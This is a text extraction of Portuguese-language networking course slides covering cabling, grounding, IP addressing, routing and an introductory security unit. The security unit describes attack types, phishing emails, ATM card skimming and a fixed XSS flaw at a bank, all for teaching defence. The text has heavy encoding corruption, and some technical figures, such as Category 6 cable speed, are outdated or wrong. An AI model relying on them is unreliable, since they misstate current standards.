BACKUP) entre a plataforma Windows 2003 e Linux com os clientes Windows XP 3
  • 4. Plano de Aula: Utilização de Notebook e datashow e prĂĄtica nos desktops de vocĂŞs; SerĂŁo avaliaçþes Mensais: 4 Avaliação:
  • 5. Materiais do curso e outros do autor ¨ Senai - Apostila http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_- _TURMA_AVANCADA.html - Redes Avançadas Power Point http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html - Redes BĂĄsicas – Power Point http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html ¨ Esamaz Segurança de Sistemas http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html Firewall http://www.4shared.com/file/40014575/5e5292cb/Firewall.html Script Linux http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html VĂ­rus http://www.4shared.com/file /42802741/12513457/virus.html Criptografia http://www.4shared.com/file/43349581/53517583/Criptografia.html Segurança de Redes http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html 5
  • 7. I – RevisĂŁo dos Conhecimentos BĂĄsico de Redes 7
  • 8. O que ĂŠ Redes de computadores? • Possibilitar o compartilhamento de informaçþes (programas e dados) armazenadas nos computadores da rede; • Permitir o compartilhamento de recursos associados Ă s mĂĄquinas interligadas; • Permitir a troca de informaçþes entre os computadores interligados; • Permitir a troca de informaçþes entre usuĂĄrios dos computadores interligados; • Possibilitar a utilização de computadores localizados remotamente; • Permitir o gerenciamento centralizado de recursos e dados; • Melhorar a segurança de dados e recursos compartilhados 8
  • 9. Porque ligar micros em rede? ¨Palavra chave “Compartilhamento”. 9
  • 10. Tipos de Redes • Usada em redes pequenas (normalmente atĂŠ 10 micros); • Baixo Custo; • FĂĄcil implementação; • Baixa segurança; • Sistema simples de cabeamento; • Micros funcionam normalmente sem estarem conectados a rede; • Micros instalados em um mesmo ambiente de trabalho; • NĂŁo existe um administrador de rede; • NĂŁo existe micros servidores; • A rede terĂĄ problemas para crescer de tamanho. 10 Ponto x Ponto
  • 11. Cliente x Servidor ¨ Deseja ter uma maior segurança na rede. (Nesse tipo de rede aparece uma figura denominada servidor. O servidor ĂŠ um computador que oferece recursos especializados, para os demais micros da rede, ao contrĂĄrio do que acontece com a rede ponto-a-ponto onde os computadores compartilham arquivos entre si e tambĂŠm podem estar fazendo um outro processamento em conjunto). ¨ Outra vantagem das redes cliente/servidor ĂŠ a forma centralizada de administração e configuração, o que melhora a segurança e organização da rede. 11
  • 12. Tipos de Servidores ¨ Servidor de Arquivos: É um servidor responsĂĄvel pelo armazenamento de arquivos de dados – como arquivos de texto, planilhas eletrĂ´nicas, etc... É importante saber que esse servidor sĂł ĂŠ responsĂĄvel por entregar os dados ao usuĂĄrio solicitante (cliente), nenhum processamento ocorre nesse servidor, os programas responsĂĄveis pelo processamento dos dados dos arquivos deve estar instalados nos computadores clientes. ¨ Servidor de ImpressĂŁo: É um servidor responsĂĄvel por processar os pedidos de impressĂŁo solicitados pelos micros da rede e enviĂĄ-los para as impressoras disponĂ­veis. Fica a cargo do servidor fazer o gerenciamento das impressĂľes. ¨ Servidor de Aplicaçþes: É responsĂĄvel por executar aplicaçþes do tipo cliente/servidor como, por exemplo, um banco de dados. Ao contrĂĄrio do servidor de arquivos, esse tipo de servidor faz processamento de informaçþes. ¨ Servidor de Correio EletrĂ´nico: ResponsĂĄvel pelo processamento e pela entrega de mensagens eletrĂ´nicas. Se for um e-mail destinado a uma pessoa fora da rede, este deverĂĄ ser passado ao servidor de comunicação (firewall) ¨ Servidor de Comunicação (Firewall): Usado para comunicação da sua rede com outras redes, como a Internete Se vocĂŞ acessa a Internet atravĂŠs de uma linha telefĂ´nica convencional, o servidor de comunicação pode ser um computador com uma placa de modem ou conexĂľes com ADSL ou LPCD. 12
  • 13. Vantagens e Desvantagem do Cliente x Servidor ¨ Custo Maior desempenho do que as redes ponto-a-ponto; ¨ Implementação necessita de especialistas; ¨ Melhor desempenho que as redes ponto-a-ponto; ¨ Alta segurança; ¨ Configuração e manutenção na rede ĂŠ feita de forma centralizada; ¨ ExistĂŞncia de servidores, que sĂŁo micros capazes de oferecer recursos aos demais micros da rede 13
  • 14. II - Noçþes de Cabeamento Estruturado 14
  • 16. Cabeamento Estruturado ¨ Cabo UTP ¨ UTP Color Codes Par 1 Branco-Azul (BA) / Azul (A) Par 2 Branco-Laranja (BL) / Laranja (L) Par 3 Branco-Verde (BV) / Verde (V) Par 4 Branco-Marrom (BM) / Marrom (M) 16
  • 17. Cabeamento Estruturado Cabo UTP / CATEGORIAS ¨ Categoria 1 – cabo de par trançado tradicional, que ĂŠ o utilizado para telefonia (instalado antes de 1983). NĂŁo ĂŠ recomendado para utilização em redes locais. ¨ Categoria 2 – cabo certificado para transmissĂŁo de dados (possui 4 pares trançados). Sua utilização em redes tambĂŠm nĂŁo ĂŠ recomendĂĄvel. ¨ Categoria 3 – esta categoria suporta 10 Mbit/sec numa rede Ethernet, 4Mbit/s em uma Token Ring. Este cabo permite que atĂŠ quatro telefones normais ou dois multilinhas sejam conectados ao equipamento da companhia telefĂ´nica. ¨ Categoria 4 – esta categoria suporta taxas de transmissĂŁo de atĂŠ 16 Mbit/s em uma rede Token Ring. Este cabo possui quatro pares. ¨ Categoria 5 – possui 4 pares trançados com oito torçþes. Suporta taxas de transmissĂŁo de 100 Mbit/s. Sua utilização ĂŠ adequada para redes Fast Ethernet e redes ATM. No inĂ­cio dos anos 90, 60% dos edifĂ­cios possuĂ­am este tipo de cabo (EUA). ¨ Categoria 6 – tambĂŠm possui 4 pares trançados. Suporta taxas de transmissĂŁo de atĂŠ 155 Mbit/s. Sua utilização ĂŠ adequada a redes Fast Ethernet para transmissĂŁo de dados e voz. 17
  • 19. Cabeamento Estruturado ¨Delay É um dos itens mais importantes, pois a estruturação fĂ­sica pode influenciar na performance e velocidade da rede. É ideal que tenha o menor nĂşmero de segmentação e quando ocorrer a segmentação que seja centralizado os servidores, pontos de saĂ­da da rede e principais clientes no switch principal. 19
  • 20. Cabeamento Estruturado ¨Processo da Crimpagem Normal - Padronização EIA/TIA 568ÂŞ – Conhecida como “seqßência de crimpagem de normal”. Utilizada para conexĂŁo de um microcomputador a um HUB ou SWITCH. 20 EIA/TIA-568ÂŞ 1. Branco-Verde 2. Verde 3. Branco-Laranja 4. Azul 5. Branco-Azul 6. Laranja 7. Branco-Marrom 8. Marrom
  • 21. Cabeamento Estruturado ¨Crossover - Um cabo crossover consiste na interligação de 2 (dois) computadores pelas respectivas placas de rede sem ser necessĂĄrio a utilização de um concentrador (Hub ou Switch) ou a ligação de modems a CABO com a maquina cliente com conectores do tipo RJ45. A alteração dos padrĂľes das pinagens dos cabos torna possĂ­vel a configuração de cabo crossover ou cabo direto. A ligação ĂŠ feita com um cabo de par trançado (na maioria das vezes) onde se tem: em uma ponta o padrĂŁo T568A, e, em outra o padrĂŁo T568B (utilizado tambĂŠm com modems ADSL). 21 1ÂŞ ponta do cabo branco verde verde branco laranja azul branco azul laranja branco marrom marrom 2ÂŞ ponta do cabo branco laranja laranja branco verde azul branco azul verde branco marrom marrom
  • 22. Cabeamento Estruturado ¨1ÂŞ PrĂĄtica: Processo da Crimpagem 22
  • 26. Cabeamento Estruturado ¨O que nĂŁo pode ocorrer 26
  • 27. Cabeamento Estruturado ¨O que nĂŁo pode ocorrer 27
  • 31. Cabeamento Estruturado 31 2ÂŞ PrĂĄtica: Processo da Crimpagem
  • 37. SugestĂŁo para a Rede ElĂŠtrica ¨Ideal ter a cada circuito de 10 A atĂŠ 3 tomadas; ¨NĂŁo permitir que sejam ligados outros equipamentos como: Copiadoras, ventiladores, motores elĂŠtricos, ou qualquer outro que exija ou produza ruĂ­do na linha. 37
  • 38. SugestĂŁo para a Rede ElĂŠtrica 38
  • 39. SugestĂŁo para a Rede ElĂŠtrica ¨As tomadas devem ser do tipo universal de trĂŞs pinos (tripolares) e a ligação fase/neutro/terra ¨ As tensĂľes aproximadas na rede elĂŠtrica deverĂŁo ser as seguintes: Entre terra e fase = 117 V Entre neutro e fase = 115 V Entre terra e neutro = 2,5 V(valor Maximo tolerado) 39
  • 40. SugestĂŁo para a Rede ElĂŠtrica 40
  • 41. Aterramento ¨ O terra dos equipamentos de informĂĄtica DEVE ser totalmente independente dos demais terras existentes. ¨ Observando o seguinte na instalação: Ser construĂ­do ĂĄ distância mĂ­nima de 2,40m dos outros terras do quadro e do neutro e a uma distância mĂ­nima de 25,00 do terra de pĂĄra-raios. O cabo que liga as barras de aterramento ao quadro deve ser encapado, possuir bitola compatĂ­vel com a distancia entre o sistema e o quadro, e NÃO DEVERÁ ESTAR NUNCA CONECTADO AO NEUTRO.NĂŁo sĂŁo aconselhĂĄveis distâncias maiores que 50m entre o terra e o quadro de distribuição. 41
  • 42. Aterramento ¨ Material necessĂĄrio para um aterramento simples: - 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de diâmetro. - 6 abraçadeiras de bronze para as barras de cobre. - 10 metros de fio isolado, de bitola idĂŞntica ĂĄ dos fios fase e neutro. - Sal grosso, carvĂŁo vegetal e enxofre em quantidades suficientes para cobrir o poço dos eletrodos. - Água destilada suficiente para regar a mistura. - As barras de cobre sĂŁo chamadas eletrodos de aterramento; dĂŁo uma referĂŞncia de terra de 0 volte uma conexĂŁo ĂĄ terra para descargas elĂŠtricas atmosfĂŠricas. TambĂŠm fornecem uma trajetĂłria de impedância baixa ĂĄ terra ( valor mĂĄximo de 25 ohms). 42
  • 44. Aterramento ¨ ConsequĂŞncias da falta de aterramento: - Aparição de BAD CLUSTERS no HD ou atĂŠ mesmo a perda total. Isto nĂŁo demora a acontecer. - VocĂŞ poderĂĄ perder seu HD em 2 ou 3 meses. - Danos na placa mĂŁe. - Danos na memĂłria, que podem vir a causar perda repentina de dados e ou congelamento de todo o sistema. 44
  • 45. DOCUMENTAR UMA REDE ¨FĂ­sicamente: - Asbuilt ¨LĂłgicamente: - Software InventĂĄrio; (http://www.softwarepublico.gov.br/spb/ver-comunidade? community_id=3585) - Help Desk; (http://ocomonphp.sourceforge.net/) - Analyzer Network; (Network supervisor – 3COM) - Logs (Firewall, event view, /var/log/messages) 45
  • 46. Criação de AnteProjeto de Rede ¨Veja quando falamos em projeto, nĂŁo queremos e nĂŁo vamos formar engenheiros aqui, nossa intenção e mostrar que uma documentação bem feita pode ser o diferencial dentro desta ĂĄrea , o projeto pode ser escrito, nĂŁo necessariamente um desenho, lĂłgico que se possuir o desenho ĂŠ muito melhor, mesmo porque hoje existem ferramentas para auxiliar neste propĂłsito. 46
  • 48. Elaboração de um Projeto de Rede 48 ¨ Informaçþes repassada pelo empresa: - 1 Caso: Rede 100 % cabeada; - 2 Caso: Rede Mista ¨ Criação da Documentação do Projeto: - Crianção do Site Survey; - Criação do anteprojeto; - Entrega do Asbuilt pela empresa prestadora do serviço;
  • 49. Criação dos Site Survey – 1 Caso 49
  • 50. Criação dos Site Survey – 2 Caso 50
  • 52. ExercĂ­cio: Criação de anteprojeto 52 ¨ Informaçþes repassada pelo empresa (Site Survey): - As paredes externas sĂŁo de cerâmico aparente e as paredes internas, incluindo as salas laterais , de reboco liso e pintado; - O teto ĂŠ de forro falso e o piso ĂŠ de granito natural; - O departamento de telemarketing possui divisĂłrias baixas acĂşsticas em formas de “baias”, de madeira, revestida com espuma de poliuretano e tecido grosso; - Toda iluminação ĂŠ feita com luminĂĄrias com 4 lâmpadas fluorescentes de 40 W x 220 V e localizada no centro geomĂŠtrico de cada ambiente; - Altura entre o forro e o piso ĂŠ de 2,6m; - A sala de treinamento, recebe freqĂźentemente pessoas nĂŁo ligadas a empresa, alĂŠm disso seu layout ĂŠ constantemente alterado;
  • 54. 54 III – Noçþes de Protocolo de rede
  • 56. 56
  • 57. A Mensagem em Camadas Remetente Mensagem Escrita Envelope AgĂŞncia -VocĂŞ tem uma idĂŠia e DestinatĂĄrio deseja comunica-la a outra pessoa -Tem de escolher a forma de expressar essa idĂŠia -VocĂŞ decide como de uma forma apropriada -Enfim, de fato expĂľe sua idĂŠia Rodovia/Malote Mensagem Escrita Envelope AgĂŞncia
  • 59. O que configurar ? ¨IP ¨MASCARA ¨GATEWAY ¨DNS 59
  • 60. Onde, o que e por que Configurar
  • 62. Endereços IP ¨Endereço IP: Indentificador de Rede + Indentificador de HOST 62 Endereço IP de 32 bits Identificador da rede Identificador do host REDE internet REDE REDE REDE hosts com o mesmo identificador de rede. host hosts com identificadores de rede distintos.
  • 63. 63 Como atribuir IP’s para rede abaixo? SÃO PAULO CURITIBA ... ... 230 computadores 200 computadores
  • 64. 64 endereço classe C MÁSCARA: 255.255.255.0 identificador de rede identificador do host 200.0.0.3 200.0.0.4 200.0.0.5 roteador 200.0.0.2 200.0.0.1 200.0.1.1 200.0.1.2 200.0.1.3 200.0.1.4 200.0.1.5 O roteador possui dois endereços IP, um para cada rede.
  • 65. 65 Como Atribuir IP’s para rede abaixo? SÃO PAULO CURITIBA ... ... 400 computadores 600 computadores ... 500 computadores RIO DE JANEIRO
  • 66. Solucionar Principais Problemas ¨ Usando o UtilitĂĄrio IPConfig O utilitĂĄrio IPConfig ĂŠ muito Ăştil para determinar se as configuraçþes de rede atuais sĂŁo desejadas. VĂĄrios erros podem ser detectados atravĂŠs deste utilitĂĄrio. Execute-o atravĂŠs de um Prompt de Comando (clique em Start -> Run e digite CMD), digitando ipconfig /all e teclando Enter.
  • 67. Solucionar Principais Problemas ¨ Conflito de IP: Ocorre quando um IP manual ĂŠ atribuĂ­do Ă  mĂĄquina e jĂĄ existe outro computador na rede com o mesmo IP. Nesse caso, a tela do Ipconfig deve se parecer com a seguinte: ¨ Note que os campos IP e MĂĄscara de Subrede estĂŁo zerados. Essa ĂŠ a principal caracterĂ­stica de um conflito de IPs. - Configuração incompleta: Certifique-se de que os campos DNS Servers e Default Gateway nĂŁo estĂŁo em branco.
  • 68. Solucionar Principais Problemas ¨ Note que, como nĂŁo hĂĄ servidor DNS e nem Default Gateway configurados, o computador somente poderĂĄ enviar e receber dados dentro da rede local e com outros computadores
  • 69. Solucionar Principais Problemas ¨Usando o UtilitĂĄrio PING Ela se refere ao utilitĂĄrio do TCP/IP denominado "Ping", que tem como função testar se um host estĂĄ ativo, enviando um pacote de dados para esse host e pedindo uma reposta caso ele esteja online e funcionando corretamente. EntĂŁo, "pingar" o endereço de loopback simplesmente testa se sua mĂĄquina inicializou o TCP/IP corretamente. Para fazer isso, entre em um Prompt de Comando e digite: ping 127.0.0.1 e tecle Enter. VocĂŞ tambĂŠm poderĂĄ pingar no IP da placa assim como de qualquer mĂĄquina da rede, assim como por nome dependendo de alguns serviços. Vale ser ressalta que o ping pode ser desabilitado.
  • 70. Solucionar Principais Problemas ¨ Usando o UtilitĂĄrio NETSTAT e TELNET NETSTAT – verifica os serviços que localmente a mĂĄquina/host estĂĄ provendo TELNET: Tem como função testar se o serviço estĂĄ ativo. Para fazer isso, entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. Este Teste serve tanto se vocĂŞ local ou remoto da mĂĄquina que estĂĄ provendo o serviço.
  • 72. Roteamento Indireto ¨Origem e Destino estĂŁo em redes diferentes 10.35.143.10 10.35.144.15 REDE 10.35.143.0 Tabela de Roteamento Destino Gateway 10.35.143.0 DIRETO 0.0.0.0 10.35.143.1 10.35.143.1 10.35.144.1 Router REDE 10.35.144.0 Tabela de Roteamento Destino Gateway 10.35.143.0 10.35.143.1 10.35.144.0 10.35.144.1 ....... ....... Tabela de Roteamento Destino Gateway 10.35.144.0 DIRETO 0.0.0.0 10.35.144.1
  • 73. Exemplo de roteamento Exemplo de uma rede Intranet constituĂ­da de duas redes fĂ­sicas conectadas por um roteador. 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4 192.168.0.5 192.168.1.5 roteador interno rede 192.168.0.x rede 192.168.1.x servidor 192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4 rede interna de uma empresa.
  • 75. Exemplo de Tabela de Roteamento TABELA DO ROTEADOR 1: Rede Gateway Interface 200.134.51.0 (255.255.255.0) 200.134.51.1 200.134.51.1 200.17.98.0 (255.255.255.0) 200.17.98.23 200.17.98.23 0.0.0.0 (0.0.0.0) 200.130.0.2 200.130.0.1 75 200.17.98.23 roteador 1 INTERNET roteador 2 REDE 200.17.98.X REDE 200.134.51.X 200.130.0.1 200.130.0.2 200.134.51.1
  • 76. ExercĂ­cio 1 ¨ Construa a tabela de roteamento do Roteador 1 76 200.17.98.0 200.0.0.1 200.0.0.2 200.17.98.23 INTERNET 1 255.255.255.0 200.134.51.0 255.255.255.0 200.17.98.1 200.134.51.1 INTERNET 3 2
  • 77. 77 TABELA DE ROTEAMENTO Rede Destino Mascara Gateway Interface Custo
  • 78. TABELA DE ROTEAMENTO Rede Destino Mascara Gateway Interface Custo 200.134.51.0 255.255.255.0 200.134.51.1 200.134.51.1 1 200.17.98.0 255.255.255.0 200.17.98.1 200.17.98.1 1 0.0.0.0 0.0.0.0 200.0.0.1 200.0.0.2 1 0.0.0.0 0.0.0.0 200.17.98.23 200.17.98.1 2
  • 79. 79 ExercĂ­cio 2: ¨ Utilizando a classe C: 200.0.0.0 (255.255.255.0) – A) distribua os IP’s nas duas redes abaixo – B) defina a tabela de roteamento do roteador 1. 1 2 INTERNET 100 computadores 100 computadores
  • 81. DNS - Domain Name Service ¨PadrĂŁo Aberto para Resolução de Nomes HierĂĄrquicos – Agrupa nomes em domĂ­nios. – A ĂĄrvore de nomes ĂŠ armazenada num banco ddee ddaaddooss ddiissttrriibbuuĂ­Ă­ddoo. ¨Especificaçþes do DNS – RFCs 1033, 1034, 1034, 1101, 1123, 1183 e 1536. • Expecificaçþes da Internet Task Force – Berkeley Internet Name Domain (BIND) • Implementação desenvolvida na Berkley University para a versĂŁo 4.3 SD Unix
  • 82. S Demonstraçþes: Seerrvviiççooss ddee NNoommeess A função principal dos serviços de nomes ĂŠ traduzir nomes de domĂ­nio para os seus respectivos endereços IP’s. wwwwww..coai.dceo.cmo m= 1=0 3.15.03.51.02..180 wwwwww.c.aodi.ec.ocmom wwwwww..auvfg.c.bomr = =5 02.07.52.09.62.08.80 wwwwww..auvfg.c.borm SSeerrvviiddoorr DDNNSS
  • 83. 83 IV – Redes Ponto a Ponto
  • 85. Elaboração de Projeto ¨Criar uma formulĂĄrio / checklist de informaçþes que deverĂŁo que serĂŁo coletadas junto a conversa inicial. 85 Qual a finalidade ? Quem vai acessar (de onde, como, que solução) ? Quantos computadores ? De onde vai ser o acesso ? Q o s ? Local FĂ­sico (disponibilidade para cabeamento)
  • 86. Elaborar uma proposta / Solução. ¨ Itens informados: - 2 casas (distante 500 mts) sendo que uma ĂŠ tombada pelo patrimĂ´nio histĂłrico; - Acesso de usuĂĄrio em uma rede local e clientes via Web (internet); - Acesso de funcionĂĄrios a pastas especĂ­ficas de arquivos, assim como acesso ao sistema corporativo; - 500 computares (300 comp. Em uma casa e 200 em outra); - NĂŁo posso para meu acesso nem por 1 minuto 86
  • 87. Ilustração do funcionamento do TCP/IP ¨VĂ­deo “Guerreiros da Internet”
  • 88. 88 V - Segurança de Redes
  • 89. 89 O sistema informĂĄtico mais seguro nĂŁo ĂŠ utilizĂĄvel O sistema informĂĄtico mais utilizĂĄvel ĂŠ inseguro SĂł existe um computador 100% seguro, o desligado.
  • 90. 90 Introdução ¨ A Segurança da Informação pode ser definida como a proteção de dados contra a revelação acidental ou intencional a pessoas nĂŁo autorizadas, e contra alteraçþes nĂŁo permitidas. ¨ A segurança no universo computacional divide-se em: – Segurança FĂ­sica – Segurança LĂłgica
  • 91. 91 Introdução (cont.) ¨Objetivo da Segurança InformĂĄtica – Seja qual for a dimensĂŁo de um sistema informĂĄtico, deve procurar-se atingir, na sua exploração, os seguintes objetivos: • Integridade do equipamento • Confidencialidade e a qualidade da informação • ProntidĂŁo do sistema (eficiĂŞncia x eficĂĄcia)
  • 92. O que vocĂŞ estĂĄ tentando proteger? ¨Seus dados Integridade Privacidade Disponibilidade ¨Seus recursos ¨Sua reputação 92
  • 93. Contra o que vocĂŞ estĂĄ tentando se proteger? ¨Roubo de senhas ¨Engenharia Social ¨BUG & Backdoors ¨Falha de autenticação ¨Falha de protocolo ¨Obtendo Informaçþes ¨Negando serviços (DoS) 93
  • 94. 94 Objetivos da Segurança ¨ O objetivo da segurança da informação abrange desde uma fechadura na porta da sala de computadores atĂŠ o uso de tĂŠcnicas criptogrĂĄficas sofisticadas e cĂłdigos de autorização . ¨ O estudo nĂŁo abrange somente o crime computacional (hackers), envolve qualquer tipo de violação da segurança, como erros em processamento ou cĂłdigos de programação .
  • 95. Objetivos da Segurança “Segurança nĂŁo ĂŠ uma tecnologia” Quem? O que? Quando? Como? Onde? Porque?
  • 96. 96 Objetivos da Segurança ¨A segurança de dados tem por objetivo restringir o uso de informaçþes (softwares e dados armazenados) no computador e dispositivos de armazenamento associados a indivĂ­duos selecionados.
  • 97. Os objetivos da Segurança da Informação sĂŁo: ¨Preservação do patrimĂ´nio da empresa (os dados e as informaçþes fazem parte do patrimĂ´nio ). – Deve-se preservĂĄ-lo protegendo-o contra revelaçþes acidentais, erros operacionais e contra as infiltraçþes que podem ser de dois tipos: 97 • Ataques passivos (interceptação) • Ataques ativos (interrupção, modificação e Fabricação)
  • 98. Ataques passivos AAtataqquueess P Paassssivivooss Intercepção AnĂĄlise do conteĂşdo das mensagens AnĂĄlise do trĂĄfego O objetivo ĂŠ obter informação que estĂĄ a ser transmitida. Este tipo de ataques ĂŠ muito difĂ­cil de detectar. O esforço de protecção deve ser no sentido da prevenção.
  • 99. Ataques Passivos ¨ AnĂĄlise do conteĂşdo das mensagens – Escutar e entender as informaçþes. ¨ AnĂĄlise do trĂĄfego – O oponente pode determinar a origem e identidade das comunicaçþes e pode observar a frequĂŞncia e comprimento das mesmas. Esta informação pode ser Ăştil para determinar a natureza da comunicação. Os ataques passivos sĂŁo muito difĂ­ceis de detectar porque nĂŁo envolvem nenhuma alteração de dados. A ĂŞnfase ou o esforço deve desenvolvido no sentido da prevenção e nĂŁo da detecção.
  • 100. Emissor Receptor Intercepção Intercepção Intercepção – Quando utilizadores nĂŁo autorizados conseguem aceder a recursos para os quais nĂŁo estavam autorizados. É um ataque Ă  confidencialidade. A parte nĂŁo autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violação de cabos de comunicação, para capturar dados da rede, cĂłpia ilĂ­cita de pastas e programas, etc.
  • 101. AAtataqquueess A Atitvivooss Interrupção (Disponibilidade) Modificação (Integridade) Fabricação (Autenticidade) Ataques Ativos ¨ Envolvem alguma modificação de dados. ¨ Este tipo de ataques ĂŠ muito difĂ­cil de prever, jĂĄ que, para isso, seria necessĂĄrio uma proteção completa de todos os tipos de comunicaçþes e de canais. Por esta razĂŁo, o esforço de protecção deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.
  • 102. Interrupção Emissor Receptor Interrupção Interrupção – A informação de um sistema torna-se indisponĂ­vel ou ĂŠ destruĂ­da. É um ataque Ă  disponibilidade. Exemplos: Destruição de peças de Hardware, o corte de linhas de comunicação, a inoperância do sistema de ficheiros, etc.
  • 103. Modificação Emissor Receptor Modificação Modificação – uma parte nĂŁo autorizada, nĂŁo sĂł acede Ă  informação, mas tambĂŠm a modifica. É um ataque de integridade. Exemplos: alteração de valores num ficheiro de dados; alteração de um programa para que ele funcione de maneira diferente ou modificação do conteĂşdo de mensagens transmitidas pela rede.
  • 104. Emissor Receptor Fabricação Fabricação Fabricação – uma parte nĂŁo autorizada insere dados falsos no sistema. É um ataque Ă  autenticidade. Exemplos: inserção de mensagens simuladas na rede ou a adição de registos a um ficheiro.
  • 105. 105 O que ĂŠ ataque? Ataque ĂŠ toda ação realizada com intuito ou nĂŁo de causar danos .
  • 106. Vulnerabilidades ¨Todo computador ĂŠ vulnerĂĄvel a ataques. (Possui informação) • Tipos de Vulnerabilidades – Vulnerabilidades FĂ­sicas (Meio, Construção) – Vulnerabilidades Naturais (Desastres Naturais) – Vulnerabilidades de Hardware e Software(Falhas) – Vulnerabilidades de Media (Roubos de Media) – Vulnerabilidades de Comunicação (Hacker) – Vulnerabilidades de Humanos (UsuĂĄrios) – Vulnerabilidades sobre Exploit (Brechas, Copias)
  • 108. Anatomia de um ataque Varredura Reconhecimento Enumeração InvasĂŁo Escalando privilĂŠgios Acesso Ă  informação Ocultação de rastros Negação de Serviços Instalação de back doors
  • 109. 109
  • 110. 110
  • 111. O que um hacker ataca ? Aplicaçþes Banco de dados Sistemas operacional Serviços de rede
  • 112. 112 Tipos de ataques conhecidos • Escutas – Packet Sniffing – escuta e inspeciona cada pacote da rede – IP/Session Hijacking – interceptação da seção pelo invasor • Senha – Uso de dicionĂĄrio de senhas – Força bruta – tentativa e erro • Outros ataques – Alteração de site (web defacement) – Engenharia social – Ataque fĂ­sico Ă s instalaçþes da empresa – Uso de cavalos de trĂłia e cĂłdigos maliciosos – Trashing – revirar lixo em busca de informaçþes – War dialing – liga para vĂĄrios nĂşmeros de telefone para identificar os que tem modem instalado
  • 113. 113 Motivação para o Ataque • Por quĂŞ existem as invasĂľes aos sistemas? – Orgulho – Exibicionismo/fama – Busca de novos desafios – Curiosidade – Protesto – Roubo de informaçþes – Dinheiro – Uso de recursos adicionais – Vantagem competitiva – Vingança
  • 115. Caso Real Atualmente 70% das quebras de segurança corporativas sĂŁo geradas internamente.
  • 116. Caso Real Perfil do Fraudador*: • 68% estĂŁo na MĂŠdia e Alta GerĂŞncias • 80% tem curso superior completo • Predominantemente do Sexo Masculino • Idade mĂŠdia entre 31 e 40 anos *Pesquisa sobre crimes econĂ´micos - PWC 05
  • 117. 117 Tipos de ataques conhecidos • Negação de serviços – Syn Flood – inundar a fila de SYN para negar novas conexĂľes – Buffer overflow – colocar mais informaçþes do que cabe no buffer – Distributed DoS (DDoS) – ataque em massa de negação de serviços – Ping of Death – envio de pacote com mais de 65507 bytes – Smurf – envio de pacote ICMP em broadcast a partir de uma mĂĄquina, sendo inundada com as respostas recebidas – CGI exploit – Land, syn flooding, ... • Simulação – IP Spoofing – uso do IP de uma mĂĄquina para acessar outra – DNS Spoofing – assumir o DNS de outro sistema • Investigação – Port scanning – varredura de portas para tentar se conectar e invadir • Spam – Acesso a um grande nĂşmero de pessoas, via email, com link para sites clonados que pedem informaçþes pessoais
  • 118. Ex: Email para roubo de informaçþes 118
  • 119. Ex: Email para roubo de informaçþes 119
  • 120. Ex: Email para roubo de informaçþes 120
  • 121. Ex: Email para roubo de informaçþes 121
  • 122. Ex: Email para roubo de informaçþes 122
  • 123. Ex: Email para roubo de informaçþes 123
  • 124. Ex: Email para roubo de informaçþes 124
  • 125. Ex2: Clonagem de cartĂŁo de banco 125 Bocal preparado
  • 126. Ex2: Clonagem de cartĂŁo de banco 126 ImperceptĂ­vel para o cliente
  • 127. Ex2: Clonagem de cartĂŁo de banco Micro câmera disfarçada de porta panfleto
  • 128. Ex2: Clonagem de cartĂŁo de banco 128 VisĂŁo completa da tela e teclas digitadas
  • 129. Ex2: Clonagem de cartĂŁo de banco 129 VisĂŁo completa da tela e teclas digitadas
  • 130. Ex2: Clonagem de cartĂŁo de banco 130 Micro câmera Bateria Antena transmissora
  • 131. Ex3: Email de promoção (roubo informação) 131
  • 132. Ex3: Email de promoção (roubo informação) 132
  • 134. Ex5: Engenharia Social ¨ Ao atender um telefonema, o interlocutor se identifica como vice-diretor da empresa. VocĂŞ jĂĄ o viu pelos corredores, mas nunca falou com ele por telefone. Ele informa que se encontra na filial da empresa, em reuniĂŁo, e estĂĄ com problemas para acessar o sistema. Assim sendo, solicita a senha para que possa ter acesso. Informa, ainda, que estĂĄ acompanhado de 10 pessoas que possuem outros compromissos e que nĂŁo podem esperar por muito tempo. 134
  • 135. Ex6: Email Receita Federal 135
  • 136. CĂłpia de identidade visual de ĂłrgĂŁos pĂşblicos Pedido de download de arquivos / erros de portuguĂŞs
  • 137. CĂłpia de identidade visual de entidades populares HistĂłria estranha e mal contada Necessidade urgente de download
  • 138. Serviço inexistente Pedido de download de arquivos Ameaças
  • 139. Uso de marca popular Distrbuição muito vantajosa de prĂŞmios Pedido de download de arquivo
  • 140. Uso de marca popular Erro de portuguĂŞs DĂ­vida inexistente Falta de menção a endereço por extenso
  • 142. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Criminosos brasileiros conseguiram descobrir um problema em uma pĂĄgina do Bradesco que permitia que a mesma fosse “alterada” por meio de links, possibilitando o uso do domĂ­nio do banco para todo tipo de atividade maliciosa. Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma pĂĄgina localizada em institucional.bradesco.com.br. Se clicado, o link enviava informaçþes Ă  pĂĄgina que causavam um comportamento indesejĂĄvel, fazendo com que argumentos da query string — como ĂŠ chamada a parte do link depois do ponto de interrogação (”asp?…”) — fossem inseridas como cĂłdigo, permitindo o ataque. Dias antes da publicação desta matĂŠria, a Linha Defensiva notificou o Bradesco. O banco removeu a pĂĄgina vulnerĂĄvel dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das “chaves de segurança” usadas nas transaçþes atravĂŠs da Internet, convidando o usuĂĄrio a fazĂŞ-lo por meio do link. 142
